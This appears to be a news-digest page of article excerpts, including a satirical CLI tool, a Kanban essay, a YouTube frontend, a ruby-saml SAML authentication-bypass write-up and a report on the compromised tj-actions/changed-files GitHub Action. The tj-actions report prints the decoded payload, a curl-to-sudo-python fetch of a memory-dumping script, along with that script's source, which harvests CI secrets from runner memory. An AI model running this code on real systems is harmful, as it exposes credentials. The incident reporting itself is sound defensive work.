10 interesting stories served every morning and every evening.
Why learn actual skills when you can just look impressive instead?
Introducing rust-stakeholder - a CLI tool that generates absolutely meaningless but impressive-looking terminal output to convince everyone you’re a coding genius without writing a single line of useful code.
“After using rust-stakeholder, my boss stopped asking about my deadlines and started asking for my insights during board meetings.” - Developer who still hasn’t completed their tickets from last sprint
Remember, it’s not about your actual contribution to the codebase, it’s about how complicated your terminal looks when the VP of Engineering walks by. Nothing says “I’m vital to this company” like 15 progress bars, cryptic error messages you seem unfazed by, and technical jargon nobody understands.
* 🖥️ Dazzling Development Simulations: Make it look like you’re solving CERN-level computing problems when you’re actually just refreshing Reddit
* 🧠 Meaningless Jargon Generator: Impress with phrases like “Implemented non-euclidean topology optimization for multi-dimensional data representation” (no, it doesn’t mean anything)
* 📊 Convincing Progress Bars: Nothing says “I’m working” like a progress bar slowly advancing while you’re in the break room
* 🌐 Fake Network Activity: Simulate mission-critical API requests that are actually just your computer talking to itself
* 👥 Imaginary Team Activity: Pretend your invisible friends are sending you important pull requests
* 🎮 Domain Chameleon: Switch between backend, frontend, blockchain and 7 other domains faster than you can say “full-stack developer”
Or build from source (warning: might involve actual programming):
docker build -t rust-stakeholder .
All commands below can be used through:
docker run -t --rm rust-stakeholder [arguments]
# Impress the blockchain VC investors
rust-stakeholder --dev-type blockchain --jargon extreme --alerts

# Look busy during performance review season
rust-stakeholder --complexity extreme --team --duration 1800

# Convince everyone you're a 10x game developer
rust-stakeholder --dev-type game-development --framework "Custom Engine" --jargon high

# For the data science frauds
rust-stakeholder --dev-type data-science --jargon extreme --project "Neural-Quantum-Blockchain-AI"

# Emergency mode: Your project is due tomorrow and you haven't started
rust-stakeholder --dev-type fullstack --complexity extreme --alerts --team
* Promotion Fast-Track: Skip the tedious “delivering value” step entirely
* Meeting Domination: Let it run in the background during Zoom calls to seem busy
* Deadline Extensions: “Sorry, still resolving those critical system alerts”
* Salary Negotiation Tool: Just leave it running during your performance review
* Job Security: Become the only person who seems to understand your fictional systems
“I left rust-stakeholder running over the weekend. When I came back on Monday, I had been promoted to Principal Engineer.” - Anonymous
“My manager doesn’t know what I do, and thanks to rust-stakeholder, neither do I.” - Satisfied User
“Since installing rust-stakeholder, my colleagues have stopped asking me for help because my work ‘looks too advanced’.” - Senior Imposter Engineer
Currently, this package has the same amount of test coverage as your excuses for missing deadlines - absolutely none.
Much like your actual development skills while using this tool, tests are purely theoretical at this point. But, if you’re feeling particularly productive between fake terminal sessions, consider adding some!
After all, nothing says “I’m a serious developer with impostor syndrome” like meticulously testing a package designed to help you fake being a developer. It’s beautifully recursive.
Contributing? That would involve actual coding. But if you insist:
Fork the repo (whatever that means)
Submit a PR and pretend you understand the codebase
rust-stakeholder is satire. If your entire technical reputation is built on running a fake terminal program, I am not responsible for the inevitable moment when someone asks you to actually, you know, code something.
I am also not responsible if you accidentally impress your way into a position you’re completely unqualified for. Though if that happens, congratulations on your new career in management.
...
Read the original on github.com »
When people say Kanban, they tend to think of a specific set of practices. Whiteboards & sticky notes (both almost universally virtual). Tasks moving through columns that represent workflow. Every now and then, WIP limits even.
As we so often do with other things, this reduces a broader principle to a set of oversimplified techniques, which, in turn, tend to underdeliver in many contexts.
In its original meaning, Kanban represented a visual signal. The thing that communicated, well, something. It might have been a need, option, availability, capacity, request, etc.
In our Kanban systems, the actual Kanban is a sticky note.
It represents work, and given its closest environment (board, columns, other stickies, visual decorators), it communicates what needs, or needs not, to be done.
If it’s yellow, it’s a regular feature. If there’s a blocker on it, it requests focus. If there’s a long queue of neighbors, it suggests flow inefficiency. If it’s in a column named “ready for…”, it communicates available work and/or a handoff.
A visual signal all the way.
Let’s decouple ourselves from the most standard Kanban board design. Let’s forget columns, sticky notes, and all that jazz.
Enter Kasia, our office manager at Lunar. One of the many things Kasia takes care of is making sure we don’t run out of kitchen supplies. The tricky part is that when you don’t drink milk yourself, it becomes a pain to check the cupboard with milk reserves every now and then to ensure we’re stocked.
Then, one day, I found this.
A simple index card taped to the last milk carton in a row stating, “Bring me to Kasia.” That’s it.
In the context, it really says that:
* we’re running out of (specific kind of) milk
* we want to restock soon
* there’s enough time to make an order (we don’t drink that many cappuccinos and macchiatos)
But it’s just a visual signal. Kanban at its very core.
What Kasia designed is a perfect Kanban system. It relies on visual signals, which are put in the context. Even better, unlike most Kanban boards I see across teams, the system is self-explanatory. Everything one needs to know is written on the index card.
That’s, by the way, another characteristic of a good Kanban system. It should be as simple as possible (but not simpler). Our workflow representations tend to get more and more complex over time by themselves; we don’t need to make them so from the outset.
It’s a safe assumption that, almost always, there’s a simpler visualization that would work just as well. We, process designers, often fall into the trap of overengineering our tools.
And it’s a healthy wake-up call when someone who knows close to nothing about our fancy stuff designs a system that we would unlikely think of. One that is a perfect implementation of the original spirit, even if it doesn’t follow any of the common techniques.
Because it’s all about principles, not practices.
That’s what we can learn from Milk Kanban.
...
Read the original on brodzinski.com »
A clean and minimal YouTube frontend, without all the ads and whistles. Supported by yt-dlp, and optionally your local AI model, to make your YouTube experience local, mindful, succinct and ad-free.
* Download videos from YouTube, using yt-dlp behind the scenes
* Ignore videos you don’t want to watch
* No dependencies (except for nano-spawn, which itself has no transitive deps)
* HTML/CSS only, no JS frameworks on client/server side
* Host it in your home network to playback videos on all your devices
* Just JSON files for persistence, stupid simple management and backup
git clone https://github.com/christian-fei/my-yt.git
cd my-yt
npm i
# install yt-dlp, please see https://github.com/yt-dlp/yt-dlp
npm start
git clone https://github.com/christian-fei/my-yt.git
cd my-yt
docker compose up --build -d
docker run -p 3000:3000 -v /path/to/your/data/folder/for/persistence:/app/data christianfei/my-yt:latest
* wanted to get back my chronological feed, instead of an “algorithmically curated” one
* you can just go to the “Subscriptions” page if you want to see your YouTube videos in chronological order, as gently pointed out on HN
* no clickbait thumbnails (using mq2 instead of mqdefault thumbnail, thanks @drcheap)
* no related videos, or any algorithmically determined videos pushed in your face
* no ads (in “just skip the sponsors”)
* wanted to try integrate the so much hyped AI in a personal project
* wanted to try out yt-dlp
* wanted to experiment with the HTML5 video element and WebVTT API
* just wanted to make this, ok?
* I am even paying for YouTube Premium, so it’s not a matter of money, but a matter of control over my attention and enhanced offline experience
* Make it possible to delete downloaded videos
* Have a way to view a video at a reasonable size in between the small preview and full screen
* Add a way to download a single video without subscribing to a channel
* Specify LLM server endpoint
* List and choose available model to use for summarization
* add some options for download quality (with webm merge for 4k support)
Here are some links to help you understand the project better:
Makes requests using the chat completions API of LMStudio.
yt-dlp wrapper to download videos, get channel videos and video information and transcript
Handles persistence of video information (set video as downloaded, summary, ignored, upserting videos, etc.)
dependency-less, bare HTML5, CSS3 and JS for a basic frontend
Currently, on the LLM side of things:
* supports basic chat completions API (LMStudio right now)
* expects lms server to be running on http://localhost:1234
* customization will come in the future if there’s enough interest (let me know by opening an issue or pull-request)
Download the project while you can before I get striked with a DMCA takedown request
...
Read the original on github.com »
Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. Attackers who are in possession of a single valid signature that was created with the key used to validate SAML responses or assertions of the targeted organization can use it to construct SAML assertions themselves and are in turn able to log in as any user. In other words, it could be used for an account takeover attack. Users of ruby-saml should update to version 1.18.0. References to libraries making use of ruby-saml (such as omniauth-saml) also need to be updated to a version that references a fixed version of ruby-saml.
In this blog post, we detail newly discovered authentication bypass vulnerabilities in the ruby-saml library used for single sign-on (SSO) via SAML on the service provider (application) side. GitHub doesn’t currently use ruby-saml for authentication, but began evaluating the use of the library with the intention of using an open source library for SAML authentication once more. This library is, however, used in other popular projects and products. We discovered an exploitable instance of this vulnerability in GitLab, and have notified their security team so they can take necessary actions to protect their users against potential attacks.
GitHub previously used the ruby-saml library up to 2014, but moved to our own SAML implementation due to missing features in ruby-saml at that time. Following bug bounty reports around vulnerabilities in our own implementation (such as CVE-2024-9487, related to encrypted assertions), GitHub recently decided to explore the use of ruby-saml again. Then in October 2024, a blockbuster vulnerability dropped: an authentication bypass in ruby-saml (CVE-2024-45409) by ahacker1. With tangible evidence of exploitable attack surface, GitHub’s switch to ruby-saml had to be evaluated more thoroughly now. As such, GitHub started a private bug bounty engagement to evaluate the security of the ruby-saml library. We gave selected bug bounty researchers access to GitHub test environments using ruby-saml for SAML authentication. In tandem, the GitHub Security Lab also reviewed the attack surface of the ruby-saml library.
As is not uncommon when multiple researchers are looking at the same code, both ahacker1, a participant in the GitHub bug bounty program, and I noticed the same thing during code review: ruby-saml was using two different XML parsers during the code path of signature verification. Namely, REXML and Nokogiri. While REXML is an XML parser implemented in pure Ruby, Nokogiri provides an easy-to-use wrapper API around different libraries like libxml2, libgumbo and Xerces (used for JRuby). Nokogiri supports parsing of XML and HTML. It looks like Nokogiri was added to ruby-saml to support canonicalization and potentially other things REXML didn’t support at that time.
We both inspected the same code path in the validate_signature of xml_security.rb and found that the signature element to be verified is first read via REXML, and then also with Nokogiri’s XML parser. So, if REXML and Nokogiri could be tricked into retrieving different signature elements for the same XPath query it might be possible to trick ruby-saml into verifying the wrong signature. It looked like there could be a potential authentication bypass due to a parser differential!
The reality was actually more complicated than this.
Roughly speaking, four stages were involved in the discovery of this authentication bypass:
Discovering that two different XML parsers are used during code review.
Establishing if and how a parser differential could be exploited.
Finding an actual parser differential for the parsers in use.
To prove the security impact of this vulnerability, it was necessary to complete all four stages and create a full-blown authentication bypass exploit.
Security assertion markup language (SAML) responses are used to transport information about a signed-in user from the identity provider (IdP) to the service provider (SP) in XML format. Often the only important information transported is a username or an email address. When the HTTP POST binding is used, the SAML response travels from the IdP to the SP via the browser of the end user. This makes it obvious why there has to be some sort of signature verification in play to prevent the user from tampering with the message.
Let’s have a quick look at what a simplified SAML response looks like:
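A schematic example (labels (A) through (E) match the discussion that follows; identifiers and values are illustrative):

<Response>
  <Assertion ID="_some-assertion-id">              <!-- (A) the assertion -->
    <Signature>
      <SignedInfo>                                 <!-- (D) the part that is signed -->
        <Reference URI="#_some-assertion-id">
          <DigestValue>...</DigestValue>           <!-- (C) hash of the assertion -->
        </Reference>
      </SignedInfo>
      <SignatureValue>...</SignatureValue>         <!-- (E) signature over SignedInfo -->
    </Signature>
    <Subject>                                      <!-- (B) the transported identity -->
      <NameID>admin</NameID>
    </Subject>
  </Assertion>
</Response>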
Note: in the response above the XML namespaces were removed for better readability.
As you might have noticed: the main part of a simple SAML response is its assertion element (A), whereas the main information contained in the assertion is the information contained in the Subject element (B) (here the NameID containing the username: admin). A real assertion typically contains more information (e.g. NotBefore and NotOnOrAfter dates as part of a Conditions element.)
Normally, the Assertion (A) (without the whole Signature part) is canonicalized and then compared against the DigestValue (C) and the SignedInfo (D) is canonicalized and verified against the SignatureValue (E). In this sample, the assertion of the SAML response is signed, and in other cases the whole SAML response is signed.
We learned that ruby-saml used two different XML parsers (REXML and Nokogiri) for validating the SAML response. Now let’s have a look at the verification of the signature and the digest comparison.
The focus of the following explanation lies on the validate_signature method inside of xml_security.rb.
Inside that method, there’s a broad XPath query with REXML for the first signature element inside the SAML document:
sig_element = REXML::XPath.first(
  @working_copy,
  "//ds:Signature",
  {"ds"=>DSIG}
)
Hint: When reading the code snippets, you can tell the difference between queries for REXML and Nokogiri by looking at how they are called. REXML methods are prefixed with REXML::, whereas Nokogiri methods are called on document.
Later, the actual SignatureValue is read from this element:
base64_signature = REXML::XPath.first(
  sig_element,
  "./ds:SignatureValue",
  {"ds" => DSIG}
)
signature = Base64.decode64(OneLogin::RubySaml::Utils.element_text(base64_signature))
Note: the name of the Signature element might be a bit confusing. While it contains the actual signature in the SignatureValue node it also contains the part that is actually signed in the SignedInfo node. Most importantly the DigestValue element contains the digest (hash) of the assertion and information about the used key.
So, an actual Signature element could look like this (removed namespace information for better readability):
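(Schematic; algorithm URIs and base64 values are shortened.)

<Signature>
  <SignedInfo>
    <CanonicalizationMethod Algorithm="..."/>
    <SignatureMethod Algorithm="..."/>
    <Reference URI="#_some-assertion-id">
      <DigestMethod Algorithm="..."/>
      <DigestValue>base64-digest-of-the-canonicalized-assertion</DigestValue>
    </Reference>
  </SignedInfo>
  <SignatureValue>base64-signature-over-the-canonicalized-SignedInfo</SignatureValue>
</Signature>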
Later in the same method (validate_signature) there’s again a query for the Signature(s)—but this time with Nokogiri.
noko_sig_element = document.at_xpath('//ds:Signature', 'ds' => DSIG)
Then the SignedInfo element is taken from that signature and canonicalized:
noko_signed_info_element = noko_sig_element.at_xpath('./ds:SignedInfo', 'ds' => DSIG)
canon_string = noko_signed_info_element.canonicalize(canon_algorithm)
Let’s remember this canon_string contains the canonicalized SignedInfo element.
The SignedInfo element is then also extracted with REXML:
signed_info_element = REXML::XPath.first(
  sig_element,
  "./ds:SignedInfo",
  { "ds" => DSIG }
)
From this SignedInfo element the Reference node is read:
ref = REXML::XPath.first(signed_info_element, "./ds:Reference", {"ds"=>DSIG})
Now the code queries for the referenced node by looking for nodes with the signed element id using Nokogiri:
reference_nodes = document.xpath("//*[@ID=$id]", nil, { 'id' => extract_signed_element_id })
The method extract_signed_element_id extracts the signed element id with help of REXML. From the previous authentication bypass (CVE-2024-45409), there’s now a check that only one element with the same ID can exist.
The first of the reference_nodes is taken and canonicalized:
hashed_element = reference_nodes[0]
[..]
canon_hashed_element = hashed_element.canonicalize(canon_algorithm, inclusive_namespaces)
The canon_hashed_element is then hashed:
hash = digest_algorithm.digest(canon_hashed_element)
The DigestValue to compare it against is then extracted with REXML:
encoded_digest_value = REXML::XPath.first(
  ref,
  "./ds:DigestValue",
  { "ds" => DSIG }
)
digest_value = Base64.decode64(OneLogin::RubySaml::Utils.element_text(encoded_digest_value))
Finally, the hash (built from the element extracted by Nokogiri) is compared against the digest_value (extracted with REXML):
unless digests_match?(hash, digest_value)
The canon_string extracted some lines ago (a result of an extraction with Nokogiri) is later verified against signature (extracted with REXML).
unless cert.public_key.verify(signature_algorithm.new, signature, canon_string)
In the end, we have the following situation:
The assertion is extracted and canonicalized with Nokogiri, and then hashed. In contrast, the hash against which it will be compared is extracted with REXML.
The SignedInfo element is extracted and canonicalized with Nokogiri - it is then verified against the SignatureValue, which was extracted with REXML.
The question is: is it possible to create an XML document where REXML sees one signature and Nokogiri sees another?
It turns out, yes.
Ahacker1, participating in the bug bounty, was the first to produce a working exploit using a parser differential. Among other things, ahacker1 was inspired by the XML round-trip vulnerabilities published by Mattermost’s Juho Forsén in 2021.
Not much later, I produced an exploit using a different parser differential with the help of Trail of Bits’ Ruby fuzzer called ruzzy.
Both exploits result in an authentication bypass. Meaning that an attacker, who is in possession of a single valid signature that was created with the key used to validate SAML responses or assertions of the targeted organization, can use it to construct assertions for any users which will be accepted by ruby-saml. Such a signature can either come from a signed assertion or response from another (unprivileged) user or in certain cases, it can even come from signed metadata of a SAML identity provider (which can be publicly accessible).
An exploit could look like this. Here, an additional Signature was added as part of the StatusDetail element that is only visible to Nokogiri:
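Schematically, it could be arranged like this. The labels (A) through (D) match the explanation below; the markup that actually hides an element from one parser is deliberately not shown, since the exact parser differential remains undisclosed:

<Response>
  <Status>
    <StatusDetail>
      <!-- hidden from REXML by the (undisclosed) parser differential -->
      <Signature>
        <SignedInfo>...the valid, original SignedInfo...</SignedInfo>  <!-- (A) -->
      </Signature>
    </StatusDetail>
  </Status>
  <Signature>                       <!-- the Signature REXML sees -->
    <SignedInfo>
      <Reference URI="#_forged">
        <DigestValue>digest of the forged assertion</DigestValue>     <!-- (D) -->
      </Reference>
    </SignedInfo>
    <SignatureValue>valid signature over (A)</SignatureValue>         <!-- (B) -->
  </Signature>
  <Assertion ID="_forged">          <!-- (C) attacker-controlled assertion -->
    <Subject><NameID>admin</NameID></Subject>
  </Assertion>
</Response>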
The SignedInfo element (A) from the signature that is visible to Nokogiri is canonicalized and verified against the SignatureValue (B) that was extracted from the signature seen by REXML.
The assertion is retrieved via Nokogiri by looking for its ID. This assertion is then canonicalized and hashed (C). The hash is then compared to the hash contained in the DigestValue (D). This DigestValue was retrieved via REXML. This DigestValue has no corresponding signature.
So, two things take place:
* A valid SignedInfo with DigestValue is verified against a valid signature. (which checks out)
* A fabricated canonicalized assertion is compared against its calculated digest. (which checks out as well)
This allows an attacker, who is in possession of a valid signed assertion for any (unprivileged) user, to fabricate assertions and as such impersonate any other user.
Parts of the currently known, undisclosed exploits can be stopped by checking for Nokogiri parsing errors on SAML responses. Sadly, those errors do not result in exceptions, but need to be checked on the errors member of the parsed document:
doc = Nokogiri::XML(xml) do |config|
  config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
end

raise "XML errors when parsing: " + doc.errors.to_s if doc.errors.any?
While this is far from a perfect fix for the issues at hand, it renders at least one exploit infeasible.
We are not aware of any reliable indicators of compromise. While we’ve found a potential indicator of compromise, it only works in debug-like environments and to publish it, we would have to reveal too many details about how to implement a working exploit so we’ve decided that it’s better not to publish it. Instead, our best recommendation is to look for suspicious logins via SAML on the service provider side from IP addresses that do not align with the user’s expected location.
Some might say it’s hard to integrate systems with SAML. That might be true. However, it’s even harder to write implementations of SAML using XML signatures in a secure way. As others have stated before: it’s probably best to disregard the specifications, as following them doesn’t help build secure implementations.
To rehash how the validation works if the SAML assertion is signed, let’s have a look at the graphic below, depicting a simplified SAML response. The assertion, which transports the protected information, contains a signature. Confusing, right?
To complicate it even more: What is even signed here? The whole assertion? No!
What’s signed is the SignedInfo element and the SignedInfo element contains a DigestValue. This DigestValue is the hash of the canonicalized assertion with the signature element removed before the canonicalization. This two-stage verification process can lead to implementations that have a disconnect between the verification of the hash and the verification of the signature. This is the case for these Ruby-SAML parser differentials: while the hash and the signature check out on their own, they have no connection. The hash is actually a hash of the assertion, but the signature is a signature of a different SignedInfo element containing another hash. What you actually want is a direct connection between the hashed content, the hash, and the signature. (And once the verification is done you only want to retrieve information from the exact part that was actually verified.) Or, alternatively, use a less complicated standard to transport a cryptographically signed username between two systems - but here we are.
In this case, the library already extracted the SignedInfo and used it to verify the signature of its canonicalized string,canon_string. However, it did not use it to obtain the digest value. If the library had used the content of the already extracted SignedInfo to obtain the digest value, it would have been secure in this case even with two XML parsers in use.
As shown once again: relying on two different parsers in a security context can be tricky and error-prone. That being said: exploitability is not automatically guaranteed in such cases. As we have seen in this case, checking for Nokogiri errors could not have prevented the parser differential, but could have stopped at least one practical exploitation of it.
The initial fix for the authentication bypasses does not remove one of the XML parsers to prevent API compatibility problems. As noted, the more fundamental issue was the disconnect between verification of the hash and verification of the signature, which was exploitable via parser differentials. The removal of one of the XML parsers was already planned for other reasons, and will likely come as part of a major release in combination with additional improvements to strengthen the library. If your company relies on open source software for business-critical functionality, consider sponsoring them to help fund their future development and bug fix releases.
If you’re a user of the ruby-saml library, make sure to update to the latest version, 1.18.0, containing fixes for CVE-2025-25291 and CVE-2025-25292. References to libraries making use of ruby-saml (such as omniauth-saml) also need to be updated to a version that references a fixed version of ruby-saml. We will publish a proof of concept exploit at a later date in the GitHub Security Lab repository.
Special thanks to Sixto Martín, maintainer of ruby-saml, and Jeff Guerra from the GitHub Bug Bounty program.
Special thanks also to ahacker1 for giving inputs to this blog post.
* 2024-11-04: Bug bounty report demonstrating an authentication bypass was reported against a GitHub test environment evaluating ruby-saml for SAML authentication.
* 2024-11-12: A second authentication bypass was found by Peter that renders the planned mitigations for the first useless.
* 2024-11-14: Both parser differentials are reported to ruby-saml, the maintainer responds immediately.
* 2024-11-14: The work on potential patches by the maintainer and ahacker1 begins. (One of the initial ideas was to remove one of the XML parsers, but this was not feasible without breaking backwards compatibility).
* 2025-02-16: The maintainer starts working on a fix with the idea to be backwards-compatible and easier to understand.
* 2025-02-17: Initial contact with GitLab to coordinate a release of their on-prem product with the release of the ruby-saml library.
...
Read the original on github.blog »
We are actively investigating a critical security incident involving the tj-actions/changed-files GitHub Action. While our investigation is ongoing, we want to alert users so they can take immediate corrective actions. We will keep this post updated as we learn more. StepSecurity Harden-Runner detected this issue through anomaly detection when an unexpected endpoint appeared in the network traffic. Based on our analysis, the incident started around 9:00 AM March 14th, 2025 Pacific Time (PT) / 4:00 PM March 14th, 2025 UTC. StepSecurity has released a free secure drop-in replacement for this Action to help recover from the incident: step-security/changed-files. We highly recommend you replace all instances of tj-actions/changed-files with the StepSecurity secure alternatives.
Update 1: Most versions of tj-actions/changed-files are compromised.
Update 2: We have detected multiple public repositories have leaked secrets in build logs. As these build logs are public, anyone can steal these secrets. If you maintain any public repositories that use this Action, please review the recovery steps immediately.
Update 3: GitHub has removed the tj-actions/changed-files Action. GitHub Actions workflows can no longer use this Action.
The tj-actions/changed-files GitHub Action, which is currently used in over 23,000 repositories, has been compromised. In this attack, the attackers modified the action’s code and retroactively updated multiple version tags to reference the malicious commit. The compromised Action prints CI/CD secrets in GitHub Actions build logs. If the workflow logs are publicly accessible (such as in public repositories), anyone could potentially read these logs and obtain exposed secrets. There is no evidence that the leaked secrets were exfiltrated to any remote network destination.
Our Harden-Runner solution flagged this issue when an unexpected endpoint appeared in the workflow’s network traffic. This anomaly was caught by Harden-Runner’s behavior-monitoring capability.
The compromised Action now executes a malicious Python script that dumps CI/CD secrets from the Runner Worker process. Most of the existing Action release tags have been updated to refer to the malicious commit mentioned below (@stevebeattie notified us about this). Note: all these tags now point to the same malicious commit hash: 0e58ed8671d6b60d0890c21b07f8835ace038e67, indicating the retroactive compromise of multiple versions.
$ git tag -l | while read -r tag ; do git show --format="$tag: %H" --no-patch $tag ; done | sort -k2
v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67
v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67
v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67
v5: 0e58ed8671d6b60d0890c21b07f8835ace038e67
@salolivares has identified the malicious commit that introduces the exploit code in the Action.
The base64 encoded string in the above screenshot contains the exploit code. Here is the base64 decoded version of the code.
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  echo $B64_BLOB
else
  exit 0
fi
Here is the content of https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py
#!/usr/bin/env python3
import os
import re
import sys

def get_pid():
    # https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]

    for pid in pids:
        with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
            if b'Runner.Worker' in cmdline_f.read():
                return pid

    raise Exception('Can not get pid of Runner.Worker')

if __name__ == "__main__":
    pid = get_pid()
    print(pid)

    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"

    with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
        for line in map_f.readlines():  # for each mapped region
            m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
            if m.group(3) == 'r':  # readable region
                start = int(m.group(1), 16)
                end = int(m.group(2), 16)
                # hotfix: OverflowError: Python int too large to convert to C long
                # 18446744073699065856
                if start > sys.maxsize:
                    continue
                mem_f.seek(start)  # seek to region start
                try:
                    chunk = mem_f.read(end - start)  # read region contents
                    sys.stdout.buffer.write(chunk)
                except OSError:
                    continue
Even though GitHub shows renovate as the commit author, most likely the commit did not actually come from the renovate bot. The commit is an unverified commit, so the adversary likely provided renovate as the commit author to hide their tracks.
StepSecurity Harden-Runner secures CI/CD workflows by controlling network access and monitoring activities on GitHub-hosted and self-hosted runners. The name “Harden-Runner” comes from its purpose: strengthening the security of the runners used in GitHub Actions workflows. The Harden-Runner community tier is free for open-source projects. In addition, it offers several enterprise features.
When this Action is executed with Harden-Runner, you can see the malicious code in action. We reproduced the exploit in a test repository. When the compromised tj-actions/changed-files action runs, Harden-Runner’s insights clearly show it downloading and executing a malicious Python script that attempts to dump sensitive data from the GitHub Actions runner’s memory. You can see the behavior here:
To reproduce this, you can run the following workflow:
name: "tj-action changed-files incident"

on:
  pull_request:
    branches:
      - main

permissions:
  pull-requests: read

jobs:
  changed_files:
    runs-on: ubuntu-latest
    name: Test changed-files
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@v2
        with:
          disable-sudo: true
          egress-policy: audit

      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      # Example 1
      - name: Get changed files
        id: changed-files
        uses: tj-actions/changed-files@v35

      - name: List all changed files
        run: |
          for file in ${{ steps.changed-files.outputs.all_changed_files }}; do
            echo "$file was changed"
          done
When this workflow is executed, you can see the malicious behavior through Harden-Runner:
When this workflow runs, you can observe the malicious behavior in the Harden-Runner insights page. The compromised Action downloads and executes a malicious Python script, which attempts to dump sensitive data from the Actions Runner process memory.
🚨 If you are using any version of the tj-actions/changed-files Action, we strongly recommend you stop using it immediately until the incident is resolved. To support the community during this incident, we have released a free, secure, and drop-in replacement: step-security/changed-files. We recommend updating all instances of tj-actions/changed-files in your workflows to this StepSecurity-maintained Action.
To use the StepSecurity maintained Action, simply replace all instances of "tj-actions/changed-files@vx" with "step-security/changed-files@3dbe17c78367e7d60f00d78ae6781a35be47b4a1 # v45.0.1" or "step-security/changed-files@v45".
For enhanced security, you can pin to the specific commit SHA:
jobs:
  changed_files:
    runs-on: ubuntu-latest
    steps:
      - name: Get changed files
        id: changed-files
        uses: step-security/changed-files@3dbe17c78367e7d60f00d78ae6781a35be47b4a1 # v45.0.1
You can also reference the Action through its latest release tag:
jobs:
  changed_files:
    runs-on: ubuntu-latest
...
Read the original on www.stepsecurity.io »
Hi folks. I’m Will Larson.
If you’re looking to reach out to me, here are ways I help. If you’d like to get an email from me, subscribe to my weekly newsletter.
...
Read the original on lethain.com »
Welcome back to Can’t Get Much Higher, the internet’s top destination for using numbers to understand music and the music industry. This newsletter is made possible by my readers. Consider upgrading to a paid subscription to get access to interviews, link roundups, and other fun features. If not, continue on to a murderous story.
When you ask people about the most consequential years in popular music, there might be no year that comes up more often than 1964. Of course, the most important thing about that year is The Beatles landing in the United States and kicking off the British Invasion. But the year is endlessly discussed because so much else went on.
* Motown became a dominant force in pop music, releasing four number ones, three of which were by The Supremes
* The Beach Boys continued their run of hits
Sometimes it even felt like there were more consequential releases in a single week than there were in entire decades. Take the top five songs on the Billboard Hot 100 from the week of August 15 as an example:
* “Where Did Our Love Go” by The Supremes
* “Rag Doll” by Frankie Valli & the Four Seasons
* “Under the Boardwalk” by The Drifters
These are five songs that I return to often. And weeks like this weren’t even that rare in 1964. Just one week later, you had the same songs in the top five, except “Rag Doll” was replaced by The Animals’ “House of the Rising Sun,” the song that some claim made Dylan go electric and pushed rock music into a completely new direction.
The one claim that’s always fascinated me about 1964 is that it was a line of demarcation between an old and a new way to make music. If you were making hits in 1963 and didn’t change your sound in 1964, you were going to be waiting tables by the beginning of 1965. In other words, The Beatles-led British Invasion decimated the careers of scores of artists. But was this really the case?
The sound of rock music undoubtedly changed between the beginning and middle of the 1960s. But by looking at the Billboard Hot 100, we can see if that change in sound was being made by a fleet of new groups or a bunch of older acts adapting.
To do this, I grabbed a list of all 175 acts who released at least one top 40 single in 1963. (Fun fact: the record for the most top 40 hits that year was shared by five acts: Bobby Vinton, Brenda Lee, Dion & the Belmonts, Ray Charles, and The Beach Boys. Each had six top 40 hits.) I then decided to see which of those acts never released a hit in 1964 or any year after. In total, 88 of those 175 acts, or 50%, never had a top 40 hit again.
That’s kind of a lot. In other words, The Beatles and their fellow invading Brits killed a lot of careers. Or did they? By looking at only a single year we could be biased. And we are.
If we calculate that same rate for every single year between 1960 and 2020, we see that while the kill rate in 1964 was high, it wasn’t completely out of the ordinary. The median is around 40%. Having a multi-year career as a popular artist is just hard. By looking at the years with the highest rates, we can glean a few other things, though.
First, three of the top ten rates are 1962, 1963, and 1964. In other words, there is some credence to the theory that the British Invasion decimated many careers. Nevertheless, the fact that the rates in 1962 and 1963 are high tells me that sonic changes were brewing in the United States too. Had The Beatles not arrived, rock music probably still would have evolved in a way that would have left earlier hitmakers in the dust. That sonic evolution would have been different, though.
Second, why are half of the years in the top 10 between 1990 and 1999? Part of this is a data quirk. In 1991, Billboard changed their chart methodology. Overnight, hip-hop and country were better represented on the chart. Thus, there was a ton of artist turnover. At the same time, I think we underrate how tumultuous music was in the 1990s. Here are some oddities from that decade that I noted when discussing the swing revival in an earlier newsletter:
In other words, the 1990s were strange. And I think we are just beginning to grapple with that strangeness. Because of that, there was a ton of turnover on the charts. It’s hard for artists to keep up with trends when grunge, gangsta rap, swing, and a new breed of teen pop are all successful in a matter of years. Being a superstar isn’t easy.
Aggregating this data got me thinking about which artists have been able to survive the most musical changes and still find success. While there are artists, like Elton John and The Rolling Stones, who put out hits for decades, I want to point out one artist whose resilience still shocks me: Frankie Valli.
Born in 1934, Valli had his first major hit in 1962 with “Sherry,” a song performed with his group The Four Seasons. Before The Beatles splashed on American shores, Valli and his bandmates had eight more top 40 hits. But they were the kind of group that you’d expect to be decimated by the new sound of rock music. The Four Seasons were sort of a throwback even in 1963, Valli and his falsetto pointing toward the doo-wop of the last decade.
But Valli and his collaborators forged on. They made some musical missteps but they remained a musical force through 1967, releasing bonafide classics, like “Can’t Take My Eyes Off You.” Okay. So, he survived the British Invasion. Some others did too. But Valli didn’t go quietly as the 1960s came to a close.
In 1974, he scored a massive hit with “My Eyes Adored You,” a song that played well with the soft rock that was dominant at the time. Then disco began to boom and Valli remained undeterred. “Swearin’ to God.” “Who Loves You.” “December, 1963 (Oh, What a Night).” The man could not be stopped.
